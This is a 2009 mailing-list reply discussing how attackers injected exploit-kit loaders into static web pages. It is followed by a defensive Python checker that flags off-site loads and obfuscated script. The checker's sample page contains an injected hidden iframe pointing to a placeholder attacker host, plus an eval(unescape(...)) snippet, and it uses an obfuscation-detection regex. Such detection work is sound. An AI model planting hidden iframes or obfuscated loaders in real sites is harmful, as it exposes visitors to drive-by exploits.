On Mon, Apr 20, 2009 at 12:47 PM, Neil <kngspook@gmail.com> wrote:

> I've run into this sort of attack before, where they change the page to load content from elsewhere; but I couldn't figure out how they managed to write to the sites' pages. They were hosted on a commercial webhost, and so if it was a compromised host (which seemed like the only possibility to me), that didn't speak well for the hosting company.

SQLi is prolly the most common way to inject code. Shared databases can lead to shared security problems. It's also possible that the hosting provider could be having other security issues that would allow an attacker to directly edit the website in question. Remote file inclusions are also a popular way to modify a web page. Include a web shell, and then run a few commands to insert the malicious code into the website.

> We were having issues with the company anyways, though; so I took down the site, sanitized the pages (and removed a bunch of junk), and put the site back up with another company.
>
> But if you figure out how they got write access to a static website, I'd love to hear it.

Compromised FTP credentials would be my guess. They can be obtained by brute force attacks or credential stealing trojans. The obfuscation used by this exploit kit looked kinda familiar, but I wasn't able to match it to any exploit kits I know of. But it looks like the guys at Arbor examined this at the beginning of the year: http://asert.arbornetworks.com/2009/01/buy-buy-exploitation/ They're referring to it as Buy Buy due to the buybuy.html page. Also looks like a commenter at the article mentions that he had a problem with this that was caused by compromised FTP accounts. Of course, given how often exploit kits are copied, modified, merged, etc., etc., the Buy Buy kit could just be a relative of this one.

Regards,
-Nick
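A defender-side check for the situation Neil describes (static pages altered to load content from elsewhere), added here as an example and not code from either poster: it compares page hashes against a baseline taken when the site was known clean, and flags tags that pull content from a host other than the site's own, or inline script using the kind of obfuscation Nick mentions. `example.org` and `attacker.invalid` are placeholder hostnames and the sample pages are constructed.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "example.org"  # assumed hostname of the site being checked

# Constructed sample pages: the original, and a copy with an injected hidden
# iframe plus an obfuscated inline script (attacker.invalid is a placeholder).
CLEAN_PAGE = ("<html><body><h1>Welcome</h1>"
              "<script src='/js/app.js'></script></body></html>")
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    "<iframe src='http://attacker.invalid/buybuy.html' width=0 height=0></iframe>"
    "<script>eval(unescape('%64%6f%63'))</script></body>")

OBFUSCATION = re.compile(r"\b(eval|unescape|String\.fromCharCode)\s*\(")

class InjectionFinder(HTMLParser):
    """Flag tags that load content from another host and obfuscated inline JS."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.in_script = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        if tag in ("script", "iframe", "object", "embed"):
            a = dict(attrs)
            src = a.get("src") or a.get("data")
            host = urlparse(src).hostname if src else None
            if host and host != self.site_host:   # off-site load
                self.findings.append((tag, src))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and OBFUSCATION.search(data):
            self.findings.append(("inline-script", data.strip()[:40]))

def find_injections(html, site_host=SITE_HOST):
    p = InjectionFinder(site_host)
    p.feed(html)
    p.close()
    return p.findings

def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()

def changed_pages(baseline, current):
    """Names whose hash differs from the known-clean baseline manifest."""
    return sorted(n for n, h in current.items() if baseline.get(n) != h)
```

Run the hash comparison from a trusted copy of the site, not from the web host itself, since a compromised FTP account can rewrite the baseline as easily as the pages.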